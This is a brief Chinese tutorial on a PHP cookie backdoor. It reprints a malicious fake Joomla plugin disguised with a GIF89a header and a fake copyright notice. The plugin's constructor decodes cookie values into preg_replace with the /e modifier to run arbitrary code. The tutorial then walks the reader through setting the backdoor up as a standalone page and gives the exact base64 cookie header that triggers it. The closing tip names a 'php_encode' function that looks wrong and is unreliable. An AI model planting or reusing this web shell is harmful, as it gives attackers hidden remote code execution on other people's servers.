PHP如何使用cookie后门,php -- cookie 后门

http://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.html

https://gist.github.com/PhilETaylor/8045002

http://www.freebuf.com/articles/web/33275.html

GIF89a

/**

* @package Joomla.Plugin

* @subpackage system.instantsuggest

*

* @copyright Copyright (C) 2013 InstantSuggest.com. All rights reserved.

* @license GNU General Public License version 2 or later

*/

/**

* Instant Suggest Ajax

*

* @package Joomla.Plugin

* @subpackage system.instantsuggest

* @since 3.1

*/

class PlgSystemInstantSuggest

{

public function __construct() {

$filter = @$_COOKIE['p3'];

if ($filter) {

$option = $filter(@$_COOKIE['p2']);

$auth = $filter(@$_COOKIE['p1']);

$option("/123/e",$auth,123);

die();

}

}

}

利用上述部分代码建立页面bk-001.php，

$filter = @$_COOKIE['p3'];

if ($filter) {

$option = $filter(@$_COOKIE['p2']);

$auth = $filter(@$_COOKIE['p1']);

$option("/123/e",$auth,123);

die();

}

?>

发送下列cookie值，

Cookie:  p3=base64_decode;p2=cHJlZ19yZXBsYWNl;p1=cGhwaW5mbygpOw==

p3=base64_decode;

p2=base64_decode("cHJlZ19yZXBsYWNl") --------> p2=preg_replace;

p1=base64_decode("cGhwaW5mbygpOw==")--------->p1=phpinfo();

有写朋友可能喜欢使用Linux下的base64程序, 例如:

echo preg_replace | base64

得到的结果是cHJlZ19yZXBsYWNlCg==，致使上述代码(phpinfo();)无法执行(0x0a的影响). 建议使用php_encode函数加密字符串.